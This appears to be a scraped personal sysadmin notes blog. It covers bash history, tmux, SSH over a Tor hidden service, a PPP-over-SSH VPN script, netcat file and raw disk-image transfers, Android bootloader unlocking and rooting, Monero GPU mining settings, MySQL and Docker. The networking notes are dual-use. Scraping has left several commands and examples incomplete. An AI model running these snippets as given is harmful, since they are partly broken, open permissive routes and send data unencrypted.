Quick Substitution. Repeat the last command, replacing string1 with string2. Equivalent to !!:s/string1/string2/.

The entire command line typed so far.

Next: Modifiers, Previous: Event Designators, Up: History Interaction [Contents][Index]
9.3.2 Word Designators

Word designators are used to select desired words from the event. A ‘:’ separates the event specification from the word designator. It may be omitted if the word designator begins with a ‘^’, ‘$’, ‘*’, ‘-’, or ‘%’. Words are numbered from the beginning of the line, with the first word being denoted by 0 (zero). Words are inserted into the current line separated by single spaces.

For example,


designates the preceding command. When you type this, the preceding command is repeated in toto.

designates the last argument of the preceding command. This may be shortened to !$.

designates the second argument of the most recent command starting with the letters fi.

Here are the word designators:

0 (zero)

The 0th word. For many applications, this is the command word.

The nth word.

The first argument; that is, word 1.

The last argument.

The word matched by the most recent ‘?string?’ search.

A range of words; ‘-y’ abbreviates ‘0-y’.

All of the words, except the 0th. This is a synonym for ‘1-$’. It is not an error to use ‘*’ if there is just one word in the event; the empty string is returned in that case.

Abbreviates ‘x-$’

Abbreviates ‘x-$’ like ‘x*’, but omits the last word.

If a word designator is supplied without an event specification, the previous command is used as the event.


After the optional word designator, you can add a sequence of one or more of the following modifiers, each preceded by a ‘:’.


Remove a trailing pathname component, leaving only the head.

Remove all leading pathname components, leaving the tail.

Remove a trailing suffix of the form ‘.suffix’, leaving the basename.

Remove all but the trailing suffix.

Print the new command but do not execute it.

Quote the substituted words, escaping further substitutions.

Quote the substituted words as with ‘q’, but break into words at spaces, tabs, and newlines.

Substitute new for the first occurrence of old in the event line. Any delimiter may be used in place of ‘/’. The delimiter may be quoted in old and new with a single backslash. If ‘&’ appears in new, it is replaced by old. A single backslash will quote the ‘&’. The final delimiter is optional if it is the last character on the input line.

Repeat the previous substitution.

Cause changes to be applied over the entire event line. Used in conjunction with ‘s’, as in gs/old/new/, or with ‘&’.

Apply the following ‘s’ modifier once to each word in the event.

Auteur : Harlok

2019-04-16 21:56:19

tmux Configuration

Start windows and panes at 1, not 0,

set -g base-index 1
set -g pane-base-index 1

Replace C-b with \,

unbind C-b
set -g prefix '\'
bind-key '\' send-prefix
set-window-option -g xterm-keys on

Setup key bindings,

bind-key r command-prompt -p "rename window to:" "rename-window '%%'"
bind t source-file ~/.tmux-over-ssh.conf
bind k confirm kill-window
bind K confirm kill-server

bind tab last-window

# window movement / renumbering like in screen's :number
bind-key m command-prompt -p "move window to:" "swap-window -t '%%'"

Enable UTF-8,

setw -g utf8 on
set -g status-utf8 on

setw -g window-status-current-format "|#I:#W|"

Makes using the scroll wheel automatically switch to copy mode and scroll back the tmux scrollback buffer.

set -g mouse on

Status bar,

set-option -g status-interval 60
set-option -g status-right-length 120
set -g status-right '#(date +"%a %b %_d %H:%M") | #(hostname)'

Create a new window, swtich to home directory and type tmux-ssh,

neww -n tmux-ssh
send-keys -t tmux-ssh "cd ~/" C-m
send-keys -t tmux-ssh "tmux-ssh "

Create/attach a dev session. Start tmux create two windows for two emacs instances for for editing one for dired.

tmux has-session -t dev
if [ $? != 0 ]
tmux new-session -s dev -n emacs -d
tmux send-keys -t dev 'cd ~/' C-m
tmux send-keys -t dev 'emacs -main-instance' C-m
tmux new-window -n dired -t dev
tmux send-keys -t dev 'cd ~/' C-m
tmux send-keys -t dev 'emacs' C-m
tmux attach -t dev

Solarized theme,

# default statusbar colors
set-option -g status-bg colour235 #base02
set-option -g status-fg colour136 #yellow
set-option -g status-attr default

# default window title colors
set-window-option -g window-status-fg colour244 #base0
set-window-option -g window-status-bg default
#set-window-option -g window-status-attr dim

# active window title colors
set-window-option -g window-status-current-fg colour166 #orange
set-window-option -g window-status-current-bg default
#set-window-option -g window-status-current-attr bright

# pane border
set-option -g pane-border-fg colour235 #base02
set-option -g pane-active-border-fg colour240 #base01

# message text
set-option -g message-bg colour235 #base02
set-option -g message-fg colour166 #orange

# pane number display
set-option -g display-panes-active-colour colour33 #blue
set-option -g display-panes-colour colour166 #orange

# clock
set-window-option -g clock-mode-colour colour64 #green

Auteur : Harlok

2018-06-22 08:14:59

SSH as a Hidden Service with Tor

Note to self, setup .torrc,

RunAsDaemon 1

HiddenServiceDir /home/tor/.hidden-ssh/
HiddenServicePort 22

Locate tor address,

cat ~/.hidden-ssh/hostname

Edit rc.local so tor starts during boot,

su - tor -c "/home/tor/Apps/tor/App/tor -f /home/tor/.torrc"

Edit SSH conf so it uses the SOCKS proxy for .onion addresses,

Host *.onion
ProxyCommand nc -xlocalhost:9050 -X5 %h %p

and add hosts,

Host machine.onion
HostName dkflcfnvfkddjfkd.onion
Port 22

Auteur : Harlok

2019-04-16 22:12:49

Poor man's VPN using PPP over SSH

PPP (Point to Point Protocol) is a mechanism for running IP (Internet Protocol) over a terminal. Usually the terminal is a modem, but any tty will do. SSH creates secure ttys. Running a PPP connection over an SSH connection makes for an easy, encrypted VPN. (SSH has native tunneling support which requires root access, this method only requires root privileges on the client.)

If you run any flavor of *nix (Free/Open/NetBSD, Linux, etc), chances are everything you need is already installed (ppp and ssh). and since SSH uses a single client/server TCP connection, it NATs cleanly, easily passing through firewalls and NAT routers. It has its drawbacks though as you have PPP (TCP) inside of SSH (TCP) which is a bad idea.

On the remote end, install pppd if not already installed,

apt-get install ipppd

Enable IP Forwarding by editing /proc/sys/net/ipv4/ip\forward

echo 1 > /proc/sys/net/ipv4/ip_forward

Configure your iptables settings to enable access for PPP Clients,

iptables -F FORWARD
iptables -A FORWARD -j ACCEPT

iptables -A POSTROUTING -t nat -o eth0 -j MASQUERADE
iptables -A POSTROUTING -t nat -o ppp+ -j MASQUERADE

And make sure you can login without a password.

On the local end, start pppd, tell it to connect using SSH in batch mode, start pppd on the remote server, and use the SSH connection as the communication channel.

pppd updetach defaultroute replacedefaultroute usepeerdns noauth passive pty \
"ssh root@$remote -o Batchmode=yes /usr/sbin/pppd nodetach notty noauth ms-dns" \

When run, both your local and your remote computers will have new PPP network interfaces,

Local interface ppp0 with IP address
Remote interface ppp0 with IP address

Once pppd adds default route via ppp0 all traffic will be routed through the tunnel thus SSH will go down because OS will try to route the tunnel through the tunnel, to fix that we add a route to remote-host via local-gateway.

route add $remote gw $gateway

OS will send all SSH traffic to remote-host through our default gateway, so the tunnel keeps working fine, the rest of the traffic will go through the tunnel.

The script below automates all of the steps above, when run it will figure out the current gateway setup the tunnel and the routes so all traffic goes through the tunnel.



gateway=$(/sbin/ip route | awk '/default/ { print $3 }')

# trap ctrl-c and signal pppd to shutdown
trap close_conn INT

function close_conn(){
echo "Closing Connection."
kill -HUP $pid

function setup_conn(){
cd ~/
echo "Current Gateway " $gateway
route add $remote gw $gateway
pppd updetach defaultroute replacedefaultroute usepeerdns noauth passive pty \
"ssh root@$remote -o Batchmode=yes /usr/sbin/pppd nodetach notty noauth ms-dns" \
pid=`cat $pidfile`
echo "Public Facing IP " `curl -s '' |
sed 's/.*Current IP Address: \([ 0-9\.\.]*\).*/\1/g'`


while ps -p $pid > /dev/null;
sleep 1;
printf \
"\rConnected For: %02d:%02d:%02d:%02d" \
"$((SECONDS/86400))" "$((SECONDS/3600%24))" "$((SECONDS/60%60))" "$((SECONDS%60))"

route del $remote gw $gateway

Auteur : Harlok

2019-04-10 10:51:54

Using Netcat for File Transfers

Using Netcat for File Transfers

Netcat is like a swiss army knife for geeks. It can be used for just about anything involving TCP or UDP. One of its most practical uses is to transfer files. Non *nix people usually don't have SSH setup, and it is much faster to transfer stuff with netcat then setup SSH. netcat is just a single executable, and works across all platforms (Windows,Mac OS X, Linux).

On the receiving end running,

nc -l -p 1234 > out.file

will begin listening on port 1234.

On the sending end running,

nc -w 3 [destination] 1234 < out.file

will connect to the receiver and begin sending file.

For faster transfers if both sender and receiver has some basic *nix tools installed, you can compress the file during sending process,

On the receiving end,

nc -l -p 1234 | uncompress -c | tar xvfp -

On the sending end,

tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234

A much cooler but less useful use of netcat is, it can transfer an image of the whole hard drive over the wire using a command called dd.

On the sender end run,

dd if=/dev/hda3 | gzip -9 | nc -l 3333

On the receiver end,

nc [destination] 3333 | pv -b > hdImage.img.gz

Be warned that file transfers using netcat are not encrypted, anyone on the network can grab what you are sending, so use this only on trusted networks.

Auteur : Harlok

2018-06-22 08:12:26

What is ADB

ADB and fastboot commands on PC are used to perform different command line operations on device through USB in ROM/Recovery and bootloader mode respectively.
Android Debugging Bridge is basically used by developers to identify and fix bugs in OS (ROM). ADB works in ROM and recovery both.
Fastboot works in bootloader mode even when phone is not switched on in Recovery or ROM or even if android isn't installed on phone. In later case, bootloader can be accessed by certain button combination while powering on device; usually Power + Vol. Down.
Fastboot/ADB setup is to be made on PC to use this mode. ADB mode has more flexibility than fastboot as it supports more types of flashable files to be flashed. ADB also supports backing up Apps and Data. ADB/fastboot commands can be used to flash recovery and boot images. It can also flash ROM zip. It can flash by booting into recovery to gain root access. And above all, it is the only way to unlock bootloader without which the device functionality is too limited. Read here why we need to unlock bootloader.
In bootloader mode, usually boot logo appears on device screen.


Enable USB Debugging in Settings > Developer Options. If not available, Dev. Options can be accessed by tapping 5 (or 7) times Build Number in Settings > About Phone.
Allow ADB root access in Dev. Options or SuperSU. Some commands need root.
Allow data transfer over ADB when prompted on device screen. Otherwise you might get errors like device unauthorized etc. So keep screen unlocked at first connect.
Disable MTP, PTP, UMS etc. from USB computer connection on device to avoid any interruptions.
Install Android SDK or simply install 15 Seconds ADB Setup 1.4.2. It works up to Android Lollipop (AOSP 5). Credits to Snoop05
Windows 8.1 users who got error installing this setup should first install Windows Update KB2917929.
You will have to navigate to adb folder each time you start cmd. Or setup adb to work globally. On your PC, go to System Properties > Advanced System Settings > Environment Variables. Click on New (User Variables). Variables Name: ADB ( Or anything you want). Variables Value: ;C:\adb (if installed 15 seconds setup) or ;C:\SDK\paltform-tools.
Install ADB USB Drivers for your Android Device. To do this automatically, download and run ADB Driver Installer. Connect device through USB cable and install drivers.
NOTE: Spaces in file paths don't work in adb commands. Non-English characters and languages don't work either. Also the commands are case-sensitive.

There is a long list of adb/fastboot commands to perform numerous operations. Here are a few of those being listed keeping in view certain tasks:

On PC run Command Prompt as Administrator.

To check connected devices when ROM is running on phone:

adb devices

To boot into bootloader mode:

adb reboot bootloader

To check connected devices when in bootloader mode:

fastboot devices

To boot into ROM:

fastboot reboot

To boot into recovery:

fastboot reboot recovery

There are some common Linux commands which can be used in combination with these commands to perform certain operation. However, ADB | FASTBOOT is not necessarily required for these Linux commands. These can be run directly from Terminal Emulator in ROM or Custom Recovery. Some of them are given below.

NOTE: Some newer devices don't allow unlocking of bootloader directly to ensure more security. Instead an official method is provided to unlock BL using PC.
Read here to know about the risks of BL unlocking.

To check the bootloader status:

fastboot oem device-info

“True” on unlocked status.
If "false", run the following to unlock:

fastboot oem unlock

This will erase your data.

fastboot format:ext4 userdata

It can be performed on other flash partitions as well. A general syntax is 'fastboot format:FS PARTITION'

Download recovery.img (specific for your device) to adb folder.
To test the recovery without permanently flashing, run the following:

fastboot boot recovery.img

On next reboot, recovery will be overwritten by previous recovery.
Or to permanently flash recovery, run:

fastboot flash recovery recovery.img
fastboot reboot recovery

Stock ROM's often tend to replace custom recovery with stock one on first reboot. That's why, booting into recovery is recommended before booting into ROM.

Download boot.img (specific for your device) to adb folder and run following:

fastboot flash boot boot.img

Download (for your device) created for fastboot i.e. with android-info.txt and android-product.txt.
To wipe your device and then to flash .zip:

fastboot -w
fastboot update

GAIN ROOT (Not recommended method. Better flash directly through custom recovery).
Root is required to modify the contents of /system. You can read here further.
Download (flashable) and custom or modified recovery.img (having support to flash .zip files) to adb folder and run the following:

fastboot boot recovery.img

Now once you are in recovery, adb will work instead of fastboot.
To copy files from PC to device and then to extract files, run the following:

adb push /tmp
adb shell /sbin/recovery --update_package=/tmp/

To backup and restore all apps and their data:

adb backup -apk -shared -all -system -f C:\backup.ab
adb restore C:\backup.ab

Read here for details.

This method can be used to backup whole device e.g. to backup /data/ including /data/media/ i.e. Internal SD Card which isn't backed up by custom recovery (TWRP). Or you can get any partition image for development purpose. This method retains complete directory structure as well as file permissions, attributes and contexts.

To jump from windows command prompt to android device shell:

adb shell

These commands can also be given from Recovery Terminal instead of ADB.
To get SuperUser access (in ROM):


To list all available partitions or mount points on device:

cat /proc/partitions

Or go to "/dev/block/platform/" folder on device. Search for the folder having folder "by-name" inside it. It's msm_sdcc.1 (on Nokia X2). Run the following:

ls -al /dev/block/platform/*/by-name

Or simply use DiskInfo app to get partition name you want to copy. Say you want to copy /data (userdata) partition. On Nokia X2DS, it is mmcblk0p25.
To confirm:

readlink /dev/block/bootdevice/by-name/userdata

Run the following to copy partition:

dd if=/dev/block/mmcblk0p25 of=/sdcard/data.img


cat /dev/block/mmcblk0p25 > /sdcard/data.img


dd if=/dev/block/bootdevice/by-name/userdata of=/sdcard/data.img

data.img will be copied to your SD card.
It also works inversely (restore):

dd if=/sdcard/data.img of=/dev/block/mmcblk0p25

data.img from your SD card will be written to device.
Similarly you can copy system.img, boot.img or any other partition. However boot.img and other partitions may not be copied in ROM but in recovery mode only. So better use recovery for dd except if you're​ going to dd recovery partition itself. You can read here more about android partitions.

COPY WHOLE FOLDER (within device)
This method can be used to backup folders like /data/media/ which isn't backed up by custom recovery (TWRP).

To jump from windows command prompt to android device shell:

adb shell

These commands can also be given from Recovery Terminal.
To get SuperUser access (in ROM):


To copy from Internal Memory to SD Card:

cp -a /data/media/0/. /external_sd/internal_backup/

Or if you don't have SU permission:

cp -a /external_sd/. /sdcard/

To copy from SD Card to Internal Memory:

cp -a /external_sd/internal_backup/. /data/media/0/

However, if you are copying to an SD card with FAT32 file system, android permissions of files won't be retained and you would have to fix permissions yourself. In this case, you can use tar command to create archive of files along with their attributes ( permissions: mode & ownership + time-stamps) and security contexts etc. But FAT32 FS has also a limitations of 4GB maximum file size. You may use "split" command along with "tar" to split the archive in smaller blocks. Or use exFat or Ext4 filesystem for larger file support. Ext4 would give higher writing speed in Android but not supported in Windows i.e. SD card can't be mounted in Windows. MTP however works.
To jump from windows command prompt to android device shell:

adb shell

To get SuperUser access (in ROM):


To copy from Internal Memory to SD Card:

tar cvpf /external_sd/internal_backup/media.tar /data/media/0/

To extract from SD Card to Internal Memory (along with path):

tar -xvf /external_sd/internal_backup/media.tar

To extract from SD Card to some other location, use "-C":

tar -xvf /external_sd/internal_backup/media.tar -C /data/media/0/extracted_archive/

This method can be used to backup folders like /data/media/ which isn't backed up by custom recovery (TWRP).

To copy from PC to device:

adb push \path\to\folder\on\PC\ /path/to/folder/on/device/

To copy from device to PC:

adb pull /path/to/folder/on/device/ \path\to\folder\on\PC\

After copying from PC to device's Internal Memory (/data/media/), you might get Permission Denied error e.g. apps can't write or even read from Internal Memory. It's because Android (Linux) and Windows have different file permissions system. To FIX PERMISSIONS, boot into recovery and run following commands:
(Credits to xak944 )

adb shell

To take ownership of whole "media" directory:

chown -R media_rw:media_rw /data/media/

To fix permissions of directories:

find /data/media/ -type d -exec chmod 775 '{}' ';'

To fix permissions of files:

find /data/media/ -type f -exec chmod 664 '{}' ';'

Fastboot supports passing options. For example, while booting a modified kernel image with FramBuffer Console support, console device and its font can be provided as option:

fastboot boot -c "console=tty0,115200 fbcon=font:VGA8x8" boot-fbcon.img

Auteur : Harlok

2019-04-16 22:33:27

Information gathering


Auteur : Harlok

2019-01-29 08:56:03

Vega profile

Vega 56
Monero, AEON, Electroneum, Sumokoin, etc.

Power saving

GPU P7 1407MHz, 950mV
Memory P3 950MHz, 900mV

XMR-STAK 2.x config

"gpu_threads_conf" : [
// gpu: gfx901 memory:3920
// compute units: 64
{ "index" : 1,
"intensity" : 1932, "worksize" : 8,
"affine_to_cpu" : 3, "strided_index" : true
// gpu: gfx901 memory:3920
// compute units: 64
{ "index" : 1,
"intensity" : 1932, "worksize" : 8,
"affine_to_cpu" : 5, "strided_index" : true
Overdriventool profile



Vega 64
Monero, AEON, Electroneum, Sumokoin, etc.

High performance

GPU P7 1500MHz, 1000mV
Memory P3 1175MHz, 950mV

Power saving

GPU P7 1407MHz, 860mV
Memory P3 1107MHz, 860mV

XMR-STAK 2.x config

"gpu_threads_conf" : [
// gpu: gfx901 memory:3920
// compute units: 64
{ "index" : 0,
"intensity" : 1932, "worksize" : 8,
"affine_to_cpu" : 5, "strided_index" : true
// gpu: gfx901 memory:3920
// compute units: 64
{ "index" : 0,
"intensity" : 1932, "worksize" : 8,
"affine_to_cpu" : 3, "strided_index" : true
Overdriventool profile


Auteur : Harlok

2019-04-16 22:11:19

Bash shortcut

Working With Processes
Use the following shortcuts to manage running processes.

Ctrl+C: Interrupt (kill) the current foreground process running in in the terminal. This sends the SIGINT signal to the process, which is technically just a request—most processes will honor it, but some may ignore it.
Ctrl+Z: Suspend the current foreground process running in bash. This sends the SIGTSTP signal to the process. To return the process to the foreground later, use the fg process_name command.
Ctrl+D: Close the bash shell. This sends an EOF (End-of-file) marker to bash, and bash exits when it receives this marker. This is similar to running the exit command.

Controlling the Screen
The following shortcuts allow you to control what appears on the screen.

Ctrl+L: Clear the screen. This is similar to running the “clear” command.
Ctrl+S: Stop all output to the screen. This is particularly useful when running commands with a lot of long, verbose output, but you don’t want to stop the command itself with Ctrl+C.
Ctrl+Q: Resume output to the screen after stopping it with Ctrl+S.
Moving the Cursor
Use the following shortcuts to quickly move the cursor around the current line while typing a command.

Ctrl+A or Home: Go to the beginning of the line.
Ctrl+E or End: Go to the end of the line.
Alt+B: Go left (back) one word.
Ctrl+B: Go left (back) one character.
Alt+F: Go right (forward) one word.
Ctrl+F: Go right (forward) one character.
Ctrl+XX: Move between the beginning of the line and the current position of the cursor. This allows you to press Ctrl+XX to return to the start of the line, change something, and then press Ctrl+XX to go back to your original cursor position. To use this shortcut, hold the Ctrl key and tap the X key twice.
Deleting Text
Use the following shortcuts to quickly delete characters:

Ctrl+D or Delete: Delete the character under the cursor.
Alt+D: Delete all characters after the cursor on the current line.
Ctrl+H or Backspace: Delete the character before the cursor.
Fixing Typos
These shortcuts allow you to fix typos and undo your key presses.

Alt+T: Swap the current word with the previous word.
Ctrl+T: Swap the last two characters before the cursor with each other. You can use this to quickly fix typos when you type two characters in the wrong order.
Ctrl+_: Undo your last key press. You can repeat this to undo multiple times.
Cutting and Pasting
Bash includes some basic cut-and-paste features.

Ctrl+W: Cut the word before the cursor, adding it to the clipboard.
Ctrl+K: Cut the part of the line after the cursor, adding it to the clipboard.
Ctrl+U: Cut the part of the line before the cursor, adding it to the clipboard.
Ctrl+Y: Paste the last thing you cut from the clipboard. The y here stands for “yank”.
Capitalizing Characters
The bash shell can quickly convert characters to upper or lower case:

Alt+U: Capitalize every character from the cursor to the end of the current word, converting the characters to upper case.
Alt+L: Uncapitalize every character from the cursor to the end of the current word, converting the characters to lower case.
Alt+C: Capitalize the character under the cursor. Your cursor will move to the end of the current word.
Tab Completion
RELATED: Use Tab Completion to Type Commands Faster on Any Operating System

Tab completion is a very useful bash feature. While typing a file, directory, or command name, press Tab and bash will automatically complete what you’re typing, if possible. If not, bash will show you various possible matches and you can continue typing and pressing Tab to finish typing.

Tab: Automatically complete the file, directory, or command you’re typing.
For example, if you have a file named really_long_file_name in /home/chris/ and it’s the only file name starting with “r” in that directory, you can type /home/chris/r, press Tab, and bash will automatically fill in /home/chris/really_long_file_name for you. If you have multiple files or directories starting with “r”, bash will inform you of your possibilities. You can start typing one of them and press “Tab” to continue.

Working With Your Command History
RELATED: How to Use Your Bash History in the Linux or macOS Terminal

You can quickly scroll through your recent commands, which are stored in your user account’s bash history file:

Ctrl+P or Up Arrow: Go to the previous command in the command history. Press the shortcut multiple times to walk back through the history.
Ctrl+N or Down Arrow: Go to the next command in the command history. Press the shortcut multiple times to walk forward through the history.
Alt+R: Revert any changes to a command you’ve pulled from your history if you’ve edited it.
Bash also has a special “recall” mode you can use to search for commands you’ve previously run:

Ctrl+R: Recall the last command matching the characters you provide. Press this shortcut and start typing to search your bash history for a command.
Ctrl+O: Run a command you found with Ctrl+R.
Ctrl+G: Leave history searching mode without running a command.

Auteur : Harlok

2019-04-16 21:56:02

SSH Terminal allocation

The primary difference is the concept of interactivity. It's similar to running commands locally inside of a script, vs. typing them out yourself. It's different in that a remote command must choose a default, and non-interactive is safest. (and usually most honest)

If a PTY is allocated, applications can detect this and know that it's safe to prompt the user for additional input without breaking things. There are many programs that will skip the step of prompting the user for input if there is no terminal present, and that's a good thing. It would cause scripts to hang unnecessarily otherwise.
Your input will be sent to the remote server for the duration of the command. This includes control sequences. While a Ctrl-c break would normally cause a loop on the ssh command to break immediately, your control sequences will instead be sent to the remote server. This results in a need to "hammer" the keystroke to ensure that it arrives when control leaves the ssh command, but before the next ssh command begins.
I would caution against using ssh -t in unattended scripts, such as crons. A non-interactive shell asking a remote command to behave interactively for input is asking for all kinds of trouble.

You can also test for the presence of a terminal in your own shell scripts. To test STDIN with newer versions of bash:

# fd 0 is STDIN
[ -t 0 ]; echo $?
When aliasing ssh to ssh -t, you can expect to get an extra carriage return in your line ends. It may not be visible to you, but it's there; it will show up as ^M when piped to cat -e. You must then expend the additional effort of ensuring that this control code does not get assigned to your variables, particularly if you're going to insert that output into a database.
There is also the risk that programs will assume they can render output that is not friendly for file redirection. Normally if you were to redirect STDOUT to a file, the program would recognize that your STDOUT is not a terminal and omit any color codes. If the STDOUT redirection is from the output of the ssh client and the there is a PTY associated with the remote end of the client, the remote programs cannot make such a distinction and you will end up with terminal garbage in your output file. Redirecting output to a file on the remote end of the connection should still work as expected.
Here is the same bash test as earlier, but for STDOUT:

# fd 1 is STDOUT
[ -t 1 ]; echo $?
While it's possible to work around these issues, you're inevitably going to forget to design scripts around them. All of us do at some point. Your team members may also not realize/remember that this alias is in place, which will in turn create problems for you when they write scripts that use your alias.

Aliasing ssh to ssh -t is very much a case where you'll be violating the design principle of least surprise; people will be encountering problems they do not expect and may not understand what is causing them.

SSH escape characters and transfer of binary files
One advantage that hasn’t been mentioned in the other answers is that when operating without a pseudo-terminal, the SSH escape characters such as ~C are not supported; this makes it safe for programs to transfer binary files which may contain these sequences.

Proof of concept
Copy a binary file using a pseudo-terminal:

$ ssh -t anthony@remote_host 'cat /usr/bin/free' > ~/free
Connection to remote_host closed.
Copy a binary file without using a pseudo-terminal:

$ ssh anthony@remote_host 'cat /usr/bin/free' > ~/free2
The two files aren’t the same:

$ diff ~/free*
Binary files /home/anthony/free and /home/anthony/free2 differ
The one which was copied with a pseudo-terminal is corrupted:

$ chmod +x ~/free*
$ ./free
Segmentation fault
while the other isn’t:

$ ./free2
total used free shared buffers cached
Mem: 2065496 1980876 84620 0 48264 1502444
-/+ buffers/cache: 430168 1635328
Swap: 4128760 112 4128648
Transferring files over SSH
This is particularly important for programs such as scp or rsync which use SSH for data transfer. This detailed description of how the SCP protocol works explains how the SCP protocol consists of a mixture of textual protocol messages and binary file data.

OpenSSH helps protects you from yourself
It’s worth noting that even if the -t flag is used, the OpenSSH ssh client will refuse to allocate a pseudo-terminal if it detects that its stdin stream is not a terminal:

$ echo testing | ssh -t anthony@remote_host 'echo $TERM'
Pseudo-terminal will not be allocated because stdin is not a terminal.
You can still force the OpenSSH client to allocate a pseudo-terminal with -tt:

$ echo testing | ssh -tt anthony@remote_host 'echo $TERM'
In either case, it (sensibly) doesn’t care if stdout or stderr are redirected:

$ ssh -t anthony@remote_host 'echo $TERM' >| ssh_output
Connection to remote_host closed.

Auteur : Harlok

2019-04-16 22:03:29

MySQL performance

By Zvonko Biškup In Articles, Tips 5 Min read

You finished your brand new application, everything is working like a charm. Users are coming and using your web. Everybody is happy.

Then, suddenly, a big burst of users kills your MySQL server and your site is down. What went wrong? How can you prevent it?

Here are some tips on MySQL Performance which will help you and help your database.

In the early stage of development you should be aware of expected number of users coming to your application. If you expect many users, you should think big from the very beginning, plan for replication, scalability and performance.

But, if you optimize your SQL code, schema and indexing strategy, maybe you will not need big environment. You must always think twice as performance and scalability is not the same.

The EXPLAIN statement can be used either as a way to obtain information about how MySQL executes a SELECT statement or as a synonym for DESCRIBE.

When you precede a SELECT statement with the keyword EXPLAIN, MySQL displays information from the optimizer about the query execution plan. That is, MySQL explains how it would process the SELECT, including information about how tables are joined and in which order. EXPLAIN EXTENDED can be used to provide additional information.

Databases are typically stored on disk (with the exception of some, like MEMORY databases, which are stored in memory). This means that in order for the database to fetch information for you, it must read that information off the disk and turn it into a results set that you can use. Disk I/O is extremely slow, especially in comparison to other forms of data storage.

When your database grows to be large, the read time begins to take longer and longer. Poorly designed databases deal with this problem by allocating more space on the disk than they need. This means that the database occupies space on the disk that is being used inefficiently.

Picking the right data types can help by ensuring that the data we are storing makes the database as small as possible. We do this by selecting only the data types we need.

The reason behind using persistent connections is reducing number of connects which are rather expensive, even though they are much faster with MySQL than with most other databases.

There are some debate on the web on this topic and mysqli extension has disabled persistent connection feature, so I will not write much more on this topic. The only downside of persistent connections is that if you have many concurrent connections, max_connections setting could be reached. This is easily changed in Apache settings, so I don’t think this is the reason why you should not use persistent connections.

Persistent connections are particularly useful if you have db server on another machine. Because of the mentioned downside, use them wisely.

The query cache stores the text of a SELECT statement together with the corresponding result that was sent to the client. If an identical statement is received later, the server retrieves the results from the query cache rather than parsing and executing the statement again. The query cache is shared among sessions, so a result set generated by one client can be sent in response to the same query issued by another client.

The query cache can be useful in an environment where you have tables that do not change very often and for which the server receives many identical queries. This is a typical situation for many Web servers that generate many dynamic pages based on database content.

The query cache does not return stale data. When tables are modified, any relevant entries in the query cache are flushed.

How do you find out my MySQL query cache is working or not?
MySQL provides the stats of same just type following command at mysql> prompt:

mysql> show variables like 'query%';
Index on a column can be great performance gain, but if you use that column in a function, index is never used.

Always try to rewrite the query to not use the function with indexed column.


could be

[code lang="sql"]
WHERE event_date >= '2011/03/15' - INTERVAL 7 DAYS

and today’s date is generated from PHP. This way, index on column event_date is used and the query can be stored inside Query Cache.

SQL code is the foundation for optimizing database performance. Master SQL coding techniques like rewriting subquery SQL statements to use JOINS, eliminating cursors with JOINS and similar.

By writing great SQL code your database performance will be great.

If you specify ON DUPLICATE KEY UPDATE, and a row is inserted that would cause a duplicate value in a UNIQUE index or PRIMARY KEY, an UPDATE of the old row is performed.

INSERT INTO wordcount (word, count)
VALUES ('a_word',1)

You are saving one trip to the server (SELECT then UPDATE), cleaning you code up removing all if record_exists insert else update.

If you follow some of this tips, database will be greatful to you.

Auteur : Harlok

2019-04-16 22:08:50

Init service status

The service --status-all command tries to figure out for every init script in /etc/init.d if it supports a status command (by grepping the script for status).

If it doesn't find that string it will print [ ? ] for that service.

Otherwise it will run /etc/init.d/$application status.
If the return code is 0 it prints [ + ].
If it's not 0 it prints [ - ].

Why does ssh print [ - ] even though it's still running?
ssh is controlled by upstart in Ubuntu (13.10).
Running /etc/init.d/ssh status will produce no output and a return code of 1.

Auteur : Harlok

2019-04-16 22:35:21

Docker Commands Reference


Command : Description

$docker attach :Attach local standard input, output, and error streams to a running container
$docker build :Build an image from a Dockerfile
$docker checkpoint :Manage checkpoints
$docker commit :Create a new image from a container’s changes
$docker config :Manage Docker configs
$docker container :Manage containers
$docker cp :Copy files/folders between a container and the local filesystem
$docker create :Create a new container
$docker deploy :Deploy a new stack or update an existing stack
$docker diff :Inspect changes to files or directories on a container’s filesystem
$docker events :Get real time events from the server
$docker exec :Run a command in a running container
$docker export :Export a container’s filesystem as a tar archive
$docker history :Show the history of an image
$docker image :Manage images
$docker images :List images
$docker import :Import the contents from a tarball to create a filesystem image
$docker info :Display system-wide information
$docker inspect :Return low-level information on Docker objects
$docker kill :Kill one or more running containers
$docker load :Load an image from a tar archive or STDIN
$docker login :Log in to a Docker registry
$docker logout :Log out from a Docker registry
$docker logs :Fetch the logs of a container
$docker manifest :Manage Docker image manifests and manifest lists
$docker network :Manage networks
$docker node :Manage Swarm nodes
$docker pause :Pause all processes within one or more containers
$docker plugin :Manage plugins
$docker port :List port mappings or a specific mapping for the container
$docker ps :List containers
$docker pull :Pull an image or a repository from a registry
$docker push :Push an image or a repository to a registry
$docker rename :Rename a container
$docker restart :Restart one or more containers
$docker rm :Remove one or more containers
$docker rmi :Remove one or more images
$docker run :Run a command in a new container
$docker save :Save one or more images to a tar archive (streamed to STDOUT by default)
$docker search :Search the Docker Hub for images
$docker secret :Manage Docker secrets
$docker service :Manage services
$docker stack :Manage Docker stacks
$docker start :Start one or more stopped containers
$docker stats :Display a live stream of container(s) resource usage statistics
$docker stop :Stop one or more running containers
$docker swarm :Manage Swarm
$docker system :Manage Docker
$docker tag :Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE
$docker top :Display the running processes of a container
$docker trust :Manage trust on Docker images
$docker unpause :Unpause all processes within one or more containers
$docker update :Update configuration of one or more containers
$docker version :Show the Docker version information
$docker volume :Manage volumes
$docker wait :Block until one or more containers stop, then print their exit codes

Auteur : Harlok

2019-05-13 16:20:00

Make a debian container with Apache/php

RUN apt-get update && apt-get -y upgrade && DEBIAN_FRONTEND=noninteractive apt-get -y install \
apache2 php7.0 php7.0-mysql libapache2-mod-php7.0 curl lynx-cur

# Enable apache mods.
RUN a2enmod php7.0
RUN a2enmod rewrite

# Update the PHP.ini file, enable tags and quieten logging.
RUN sed -i "s/short_open_tag = Off/short_open_tag = On/" /etc/php/7.0/apache2/php.ini
RUN sed -i "s/error_reporting = .*$/error_reporting = E_ERROR | E_WARNING | E_PARSE/" /etc/php/7.0/apache2/php.ini

# Manually set up the apache environment variables
ENV APACHE_LOG_DIR /var/log/apache2
ENV APACHE_LOCK_DIR /var/lock/apache2

# Expose apache.

# Copy this repo into place.
ADD www_data /var/www/html

# Update the default apache site with the config we created.
ADD apache-config.conf /etc/apache2/sites-enabled/000-default.conf

# By default start up apache in the foreground, override with /bin/bash for interative.
CMD /usr/sbin/apache2ctl -D FOREGROUND

Auteur : Harlok

